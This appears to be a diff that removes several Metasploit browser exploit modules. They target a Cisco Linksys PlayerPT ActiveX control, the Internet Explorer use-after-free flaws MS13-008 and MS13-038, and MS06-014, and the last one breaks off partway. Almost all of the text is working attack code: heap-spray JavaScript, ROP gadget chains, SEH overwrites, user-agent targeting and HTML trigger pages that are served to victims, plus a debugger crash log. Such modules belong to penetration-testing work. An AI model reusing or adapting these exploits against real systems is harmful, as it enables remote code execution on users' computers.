'BadChars' => "\x00\x0d\x0a\x5c",
|
||||
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# Cisco Linksys PlayerPT ActiveX Control 1.0.0.15
|
||||
[ 'Automatic', { } ],
|
||||
[
|
||||
'IE 6 on Windows XP SP3',
|
||||
{
|
||||
'Spray' => true,
|
||||
'SprayBlocks' => 0x185,
|
||||
'SprayOffset' => '0x0',
|
||||
'OffsetStackBottom' => 8556
|
||||
}
|
||||
],
|
||||
[
|
||||
'IE 7 on Windows XP SP3 / Windows Vista SP2',
|
||||
{
|
||||
'Spray' => true,
|
||||
'SprayBlocks' => 0x185,
|
||||
'SprayOffset' => '0x0',
|
||||
'OffsetStackBottom' => 3220
|
||||
}
|
||||
],
|
||||
[
|
||||
'IE 8 on Windows XP SP3',
|
||||
{
|
||||
'Spray' => false,
|
||||
'OffsetRop' => 160,
|
||||
'Offset' => 456,
|
||||
'Ret' => 0x1002c536, # ADD ESP,0A2C # RETN from PlayerPT.ocx
|
||||
'OffsetStackBottom' => 4108
|
||||
}
|
||||
]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Mar 22 2012',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
|
||||
], self.class
|
||||
)
|
||||
|
||||
end
|
||||
|
||||
def get_spray(t, js_code, js_nops)
|
||||
randnop = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
spray = <<-JS
|
||||
var heap_obj = new heapLib.ie(0x20000);
|
||||
var code = unescape("#{js_code}");
|
||||
var #{randnop} = "#{js_nops}";
|
||||
var nops = unescape(#{randnop});
|
||||
|
||||
while (nops.length < 0x80000) nops += nops;
|
||||
|
||||
var offset = nops.substring(0, #{t['SprayOffset']});
|
||||
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
|
||||
|
||||
while (shellcode.length < 0x40000) shellcode += shellcode;
|
||||
var block = shellcode.substring(0, (0x80000-6)/2);
|
||||
|
||||
heap_obj.gc();
|
||||
for (var z=1; z < #{t['SprayBlocks']}; z++) {
|
||||
heap_obj.alloc(block);
|
||||
}
|
||||
|
||||
JS
|
||||
|
||||
return spray
|
||||
|
||||
end
|
||||
|
||||
# rop chain generated with mona.py
|
||||
def create_rop_chain()
|
||||
|
||||
rop_gadgets =
|
||||
[
|
||||
0x77c2f271, # POP EBP # RETN [msvcrt.dll]
|
||||
0x77c2f271, # skip 4 bytes [msvcrt.dll]
|
||||
0x77c5335d, # POP EBX # RETN [msvcrt.dll]
|
||||
0xffffffff, #
|
||||
0x77c127e1, # INC EBX # RETN [msvcrt.dll]
|
||||
0x77c127e1, # INC EBX # RETN [msvcrt.dll]
|
||||
0x77c4e392, # POP EAX # RETN [msvcrt.dll]
|
||||
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
|
||||
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
|
||||
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
|
||||
0x77c34de1, # POP EAX # RETN [msvcrt.dll]
|
||||
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
|
||||
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
|
||||
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
|
||||
0x77c479e2, # POP EDI # RETN [msvcrt.dll]
|
||||
0x77c39f92, # RETN (ROP NOP) [msvcrt.dll]
|
||||
0x77c3b8ba, # POP ESI # RETN [msvcrt.dll]
|
||||
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
|
||||
0x77c4e392, # POP EAX # RETN [msvcrt.dll]
|
||||
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
|
||||
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
|
||||
0x77c51025, # ptr to 'push esp # ret ' [msvcrt.dll]
|
||||
].pack("V*")
|
||||
|
||||
return rop_gadgets
|
||||
end
|
||||
|
||||
def get_payload(my_target)
|
||||
|
||||
case my_target.name
|
||||
when /IE 6 on Windows XP SP3/
|
||||
my_payload = "\x0c" * my_target['OffsetStackBottom']
|
||||
return my_payload
|
||||
when /IE 7 on Windows XP SP3 \/ Windows Vista SP2/
|
||||
my_payload = "\x0c" * my_target['OffsetStackBottom']
|
||||
return my_payload
|
||||
when /IE 8 on Windows XP SP3/
|
||||
my_payload = rand_text_alpha(my_target['OffsetRop'])
|
||||
my_payload << create_rop_chain
|
||||
my_payload << make_nops(my_target['Offset'] - my_payload.length)
|
||||
my_payload << generate_seh_record(my_target.ret)
|
||||
my_payload << payload.encoded
|
||||
my_payload << rand_text_alpha(my_target['OffsetStackBottom'] - my_payload.length)
|
||||
return my_payload
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def get_target(agent)
|
||||
#If the user is already specified by the user, we'll just use that
|
||||
return target if target.name != 'Automatic'
|
||||
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
|
||||
return targets[1] #IE 6 on Windows XP SP3
|
||||
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
|
||||
return targets[2] #IE 7 on Windows XP SP3
|
||||
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
|
||||
return targets[3] #IE 8 on Windows XP SP3
|
||||
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
|
||||
return targets[2] #IE 7 on Windows Vista SP2
|
||||
else
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
print_status("User-agent: #{agent}")
my_target = get_target(agent)
# Avoid the attack if the victim doesn't have a setup we're targeting
if my_target.nil?
print_error("Browser not supported: #{agent}")
send_not_found(cli)
return
end
js = ""
if my_target['Spray']
p = payload.encoded
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
js = get_spray(my_target, js_code, js_nops)
js = heaplib(js, {:noobfu => true})
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate(memory_sensitive: true)
end
end
sploit = get_payload(my_target)
sploit = sploit.gsub(/"/, "\\\"")
html = <<-MYHTML
<html>
<head>
<script>
#{js}
</script>
</head>
<body>
<object classid='clsid:9E065E4A-BD9D-4547-8F90-985DC62A5591' id='obj' /></object>
<script>
obj.SetSource("","","","","#{sploit}");
</script>
</body>
</html>
MYHTML
html = html.gsub(/^ {4}/, '')
print_status("Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
@ -1,286 +0,0 @@
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::RopDb
|
||||
#include Msf::Exploit::Remote::BrowserAutopwn
|
||||
#autopwn_info({
|
||||
# :ua_name => HttpClients::IE,
|
||||
# :ua_minver => "8.0",
|
||||
# :ua_maxver => "8.0",
|
||||
# :javascript => true,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :rank => GoodRanking
|
||||
#})
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability",
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Microsoft Internet Explorer. A
|
||||
use-after-free condition occurs when a CButton object is freed, but a reference
|
||||
is kept and used again during a page reload, an invalid memory that's controllable
|
||||
is used, and allows arbitrary code execution under the context of the user.
|
||||
|
||||
Please note: This vulnerability has been exploited in the wild targeting
|
||||
mainly China/Taiwan/and US-based computers.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'eromang',
|
||||
'mahmud ab rahman',
|
||||
'juan vazquez', #Metasploit
|
||||
'sinn3r', #Metasploit
|
||||
'Peter Vreugdenhil' #New trigger & new exploit technique
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2012-4792' ],
|
||||
[ 'OSVDB', '88774' ],
|
||||
[ 'US-CERT-VU', '154201' ],
|
||||
[ 'BID', '57070' ],
|
||||
[ 'MSB', 'MS13-008' ],
|
||||
[ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],
|
||||
[ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],
|
||||
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ],
|
||||
[ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ],
|
||||
[ 'URL', 'http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/' ],
|
||||
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00",
|
||||
'Space' => 1024,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ],
|
||||
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],
|
||||
[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],
|
||||
[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],
|
||||
[ 'IE 8 on Windows 7', { 'Rop' => :jre } ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Dec 27 2012",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
|
||||
])
|
||||
|
||||
end
|
||||
|
||||
def get_target(agent)
|
||||
#If the user is already specified by the user, we'll just use that
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
|
||||
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
|
||||
|
||||
ie_name = "IE #{ie}"
|
||||
|
||||
case nt
|
||||
when '5.1'
|
||||
os_name = 'Windows XP SP3'
|
||||
when '5.2'
|
||||
os_name = 'Windows Server 2003'
|
||||
when '6.0'
|
||||
os_name = 'Windows Vista'
|
||||
when '6.1'
|
||||
os_name = 'Windows 7'
|
||||
else
|
||||
# OS not supported
|
||||
return nil
|
||||
end
|
||||
|
||||
targets.each do |t|
|
||||
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
|
||||
print_status("Target selected as: #{t.name}")
|
||||
return t
|
||||
end
|
||||
end
|
||||
|
||||
return nil
|
||||
end
|
||||
|
||||
def junk(n=4)
|
||||
return rand_text_alpha(n).unpack("V")[0].to_i
|
||||
end
|
||||
|
||||
def nop
|
||||
return make_nops(4).unpack("V")[0].to_i
|
||||
end
|
||||
|
||||
def get_payload(t, cli)
|
||||
code = payload.encoded
|
||||
|
||||
# No rop. Just return the payload.
|
||||
return code if t['Rop'].nil?
|
||||
|
||||
# Make post code execution more stable
|
||||
code << rand_text_alpha(12000)
|
||||
|
||||
msvcrt_align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
|
||||
java_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
|
||||
|
||||
rop_payload = ''
|
||||
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
case t.name
|
||||
when 'IE 8 on Windows XP SP3'
|
||||
rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'xp'})
|
||||
when 'IE 8 on Windows Server 2003'
|
||||
rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'2003'})
|
||||
end
|
||||
else
|
||||
rop_payload = generate_rop_payload('java', java_align + code)
|
||||
end
|
||||
|
||||
rop_payload
|
||||
end
|
||||
|
||||
def load_exploit_html(my_target, cli)
|
||||
|
||||
case my_target['Rop']
|
||||
when :msvcrt
|
||||
case my_target.name
|
||||
when 'IE 8 on Windows XP SP3'
|
||||
align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
|
||||
xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
|
||||
when 'IE 8 on Windows Server 2003'
|
||||
align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
|
||||
xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
|
||||
end
|
||||
else
|
||||
align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
|
||||
xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
|
||||
end
|
||||
|
||||
padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
|
||||
js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))
|
||||
|
||||
html = %Q|<!doctype html>
|
||||
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
|
||||
<head>
|
||||
<meta>
|
||||
<?IMPORT namespace="t" implementation="#default#time2">
|
||||
</meta>
|
||||
|
||||
<script>
|
||||
#{js_mstime_malloc}
|
||||
|
||||
|
||||
function helloWorld() {
|
||||
e_form = document.getElementById("formelm");
|
||||
e_div = document.getElementById("divelm");
|
||||
|
||||
for(i =0; i < 20; i++) {
|
||||
document.createElement('button');
|
||||
}
|
||||
e_div.appendChild(document.createElement('button'));
|
||||
e_div.firstChild.applyElement(e_form);
|
||||
|
||||
e_div.innerHTML = "";
|
||||
e_div.appendChild(document.createElement('body'));
|
||||
|
||||
CollectGarbage();
|
||||
|
||||
p = unescape("#{padding}");
|
||||
for (i=0; i < 3; i++) {
|
||||
p += unescape("#{padding}");
|
||||
}
|
||||
p += unescape("#{js_payload}");
|
||||
|
||||
fo = unescape("#{align_esp}");
|
||||
for (i=0; i < 55; i++) {
|
||||
if (i == 54) { fo += unescape("#{xchg_esp}"); }
|
||||
else { fo += unescape("#{align_esp}"); }
|
||||
}
|
||||
|
||||
fo += p;
|
||||
|
||||
mstime_malloc({shellcode:fo, heapBlockSize:0x58, objId:"myanim"});
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
|
||||
<body onload="eval(helloWorld())">
|
||||
<t:ANIMATECOLOR id="myanim"/>
|
||||
<div id="divelm"></div>
|
||||
<form id="formelm">
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
|
||||
|
||||
return html
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
agent = request.headers['User-Agent']
|
||||
uri = request.uri
|
||||
print_status("Requesting: #{uri}")
|
||||
|
||||
my_target = get_target(agent)
|
||||
# Avoid the attack if no suitable target found
|
||||
if my_target.nil?
|
||||
print_error("Browser not supported, sending 404: #{agent}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
html = load_exploit_html(my_target, cli)
|
||||
html = html.gsub(/^ {4}/, '')
|
||||
print_status("Sending HTML...")
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
=begin
|
||||
(87c.f40): Access violation - code c0000005 (first chance)
|
||||
First chance exceptions are reported before any exception handling.
|
||||
This exception may be expected and handled.
|
||||
eax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400
|
||||
eip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
|
||||
mshtml!CMarkup::OnLoadStatusDone+0x504:
|
||||
637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=????????
|
||||
0:008> k
|
||||
ChildEBP RetAddr
|
||||
020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504
|
||||
020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47
|
||||
020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f
|
||||
020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12
|
||||
020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb
|
||||
020bfd78 7e418734 mshtml!GlobalWndProc+0x183
|
||||
020bfda4 7e418816 USER32!InternalCallWinProc+0x28
|
||||
020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150
|
||||
020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306
|
||||
020bfe7c 01252ec9 USER32!DispatchMessageW+0xf
|
||||
020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461
|
||||
020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1
|
||||
020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab
|
||||
020bffec 00000000 kernel32!BaseThreadStart+0x37
|
||||
|
||||
0:008> r
|
||||
eax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120
|
||||
eip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
|
||||
mshtml!CMarkup::OnLoadStatusDone+0x504:
|
||||
637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=????????
|
||||
=end
@ -1,232 +0,0 @@
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::RopDb
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:ua_name => HttpClients::IE,
|
||||
:ua_minver => "8.0",
|
||||
:ua_maxver => "8.0",
|
||||
:javascript => true,
|
||||
:os_name => OperatingSystems::Match::WINDOWS,
|
||||
:rank => GoodRanking
|
||||
})
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability",
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Microsoft Internet Explorer. A
|
||||
use-after-free condition occurs when a CGenericElement object is freed, but a
|
||||
reference is kept on the Document and used again during rendering, an invalid
|
||||
memory that's controllable is used, and allows arbitrary code execution under the
|
||||
context of the user.
|
||||
|
||||
Please note: This vulnerability has been exploited in the wild on 2013 May, in
|
||||
the compromise of the Department of Labor (DoL) Website.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Unknown',
|
||||
'EMH',
|
||||
'juan vazquez', #RCA
|
||||
'sinn3r' #RCA
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2013-1347' ],
|
||||
[ 'OSVDB', '92993' ],
|
||||
[ 'MSB', 'MS13-038' ],
|
||||
[ 'US-CERT-VU', '237655' ],
|
||||
[ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],
|
||||
[ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00",
|
||||
'Space' => 1024,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ],
|
||||
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],
|
||||
[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],
|
||||
[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],
|
||||
[ 'IE 8 on Windows 7', { 'Rop' => :jre } ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "May 3 2013",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
|
||||
])
|
||||
|
||||
end
|
||||
|
||||
def get_target(agent)
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
|
||||
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
|
||||
|
||||
ie_name = "IE #{ie}"
|
||||
|
||||
case nt
|
||||
when '5.1'
|
||||
os_name = 'Windows XP SP3'
|
||||
when '5.2'
|
||||
os_name = 'Windows Server 2003'
|
||||
when '6.0'
|
||||
os_name = 'Windows Vista'
|
||||
when '6.1'
|
||||
os_name = 'Windows 7'
|
||||
else
|
||||
# OS not supported
|
||||
return nil
|
||||
end
|
||||
|
||||
targets.each do |t|
|
||||
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
|
||||
print_status("Target selected as: #{t.name}")
|
||||
return t
|
||||
end
|
||||
end
|
||||
|
||||
return nil
|
||||
end
|
||||
|
||||
def get_payload(t, cli)
|
||||
rop_payload = ''
|
||||
|
||||
# Extra junk in the end to make sure post code execution is stable.
|
||||
p = payload.encoded
|
||||
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
|
||||
rop_payload = ''
|
||||
if t.name == 'IE 8 on Windows XP SP3'
|
||||
rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})
|
||||
elsif t.name == 'IE 8 on Windows Server 2003'
|
||||
rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})
|
||||
end
|
||||
|
||||
else
|
||||
code = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
|
||||
code << p
|
||||
code << rand_text_alpha(12000)
|
||||
|
||||
rop_payload = generate_rop_payload('java', code)
|
||||
end
|
||||
|
||||
return rop_payload
|
||||
end
|
||||
|
||||
def load_exploit_html(my_target, cli)
|
||||
case my_target['Rop']
|
||||
when :msvcrt
|
||||
case my_target.name
|
||||
when 'IE 8 on Windows XP SP3'
|
||||
align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
|
||||
xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
|
||||
when 'IE 8 on Windows Server 2003'
|
||||
align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
|
||||
xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
|
||||
end
|
||||
else
|
||||
align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
|
||||
xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
|
||||
end
|
||||
|
||||
padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
|
||||
js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))
|
||||
|
||||
|
||||
html = %Q|
|
||||
<!doctype html>
|
||||
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
|
||||
<head>
|
||||
<meta>
|
||||
<?IMPORT namespace="t" implementation="#default#time2">
|
||||
</meta>
|
||||
<script>
|
||||
#{js_mstime_malloc}
|
||||
|
||||
function helloWorld()
|
||||
{
|
||||
sparkle = unescape("ABCD");
|
||||
for (i=0; i < 2; i++) {
|
||||
sparkle += unescape("ABCD");
|
||||
}
|
||||
sparkle += unescape("AB");
|
||||
sparkle += unescape("#{js_payload}");
|
||||
magenta = unescape("#{align_esp}");
|
||||
for (i=0; i < 0x70/4; i++) {
|
||||
if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
|
||||
else { magenta += unescape("#{align_esp}"); }
|
||||
}
|
||||
magenta += sparkle;
|
||||
|
||||
document.body.contentEditable="true";
|
||||
f0 = document.createElement('span');
|
||||
f1 = document.createElement('span');
|
||||
f2 = document.createElement('span');
|
||||
document.body.appendChild(f0);
|
||||
document.body.appendChild(f1);
|
||||
document.body.appendChild(f2);
|
||||
for (i=0; i < 20; i++) { document.createElement("img"); }
|
||||
f2.appendChild(document.createElement('datalist'));
|
||||
f1.appendChild(document.createElement('span'));
|
||||
CollectGarbage();
|
||||
f1.appendChild(document.createElement('table'));
|
||||
try { f0.offsetParent=null;}
|
||||
catch(e) { }
|
||||
f2.innerHTML = "";
|
||||
f1.innerHTML = "";
|
||||
f0.appendChild(document.createElement('hr'));
|
||||
mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body onload="eval(helloWorld());">
|
||||
<t:ANIMATECOLOR id="myanim"/>
|
||||
</body>
|
||||
</html>
|
||||
|
|
||||
|
||||
return html
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
agent = request.headers['User-Agent']
|
||||
uri = request.uri
|
||||
print_status("Requesting: #{uri}")
|
||||
|
||||
my_target = get_target(agent)
|
||||
if my_target.nil?
|
||||
print_error("Browser not supported, sending 404: #{agent}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
html = load_exploit_html(my_target, cli)
|
||||
html = html.gsub(/^ {4}/, '')
|
||||
print_status("Sending HTML...")
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
end
|
||||
end
@ -1,263 +0,0 @@
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::Seh
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:ua_name => HttpClients::IE,
|
||||
# In badly misconfigured situations, IE7 and 8 could be vulnerable to
|
||||
# this, but by default they throw an ugly popup that stops all script
|
||||
# execution until the user deals with it and aborts everything if they
|
||||
# click "no". Not worth the risk of being unable to try more recent
|
||||
# exploits. Make sure service packs on top of 6.0 are considered less
|
||||
# than the max by setting to 6.1 (which doesn't really exist).
|
||||
:ua_maxver => "6.1",
|
||||
:javascript => true,
|
||||
:os_name => OperatingSystems::Match::WINDOWS,
|
||||
:method => [ 'CreateObject', 'GetObject' ],
|
||||
:classid =>
|
||||
[
|
||||
'{BD96C556-65A3-11D0-983A-00C04FC29E36}',
|
||||
'{BD96C556-65A3-11D0-983A-00C04FC29E30}',
|
||||
'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',
|
||||
'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',
|
||||
'{6414512B-B978-451D-A0D8-FCFDF33E833C}',
|
||||
'{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
|
||||
'{639F725F-1B2D-4831-A9FD-874847682010}',
|
||||
'{BA018599-1DB3-44f9-83B4-461454C84BF8}',
|
||||
'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
|
||||
'{E8CCCDDF-CA28-496b-B050-6C07C962476B}',
|
||||
'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
|
||||
'{0006F033-0000-0000-C000-000000000046}',
|
||||
'{0006F03A-0000-0000-C000-000000000046}',
|
||||
],
|
||||
#:rank => ExcellentRanking # reliable exe writer
|
||||
})
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a generic code execution vulnerability in Internet
|
||||
Explorer by abusing vulnerable ActiveX objects.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'hdm',
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
# MDAC
|
||||
[ 'MSB', 'MS06-014' ],
|
||||
[ 'CVE', '2006-0003' ],
|
||||
[ 'OSVDB', '24517' ],
|
||||
# WMI Object Broker
|
||||
[ 'MSB', 'MS06-073' ],
|
||||
[ 'CVE', '2006-4704' ],
|
||||
[ 'OSVDB', '30155' ],
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 2048,
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ],
|
||||
|
||||
# Patched
|
||||
[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ],
|
||||
# Found in mpack
|
||||
[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ],
|
||||
|
||||
# Patched
|
||||
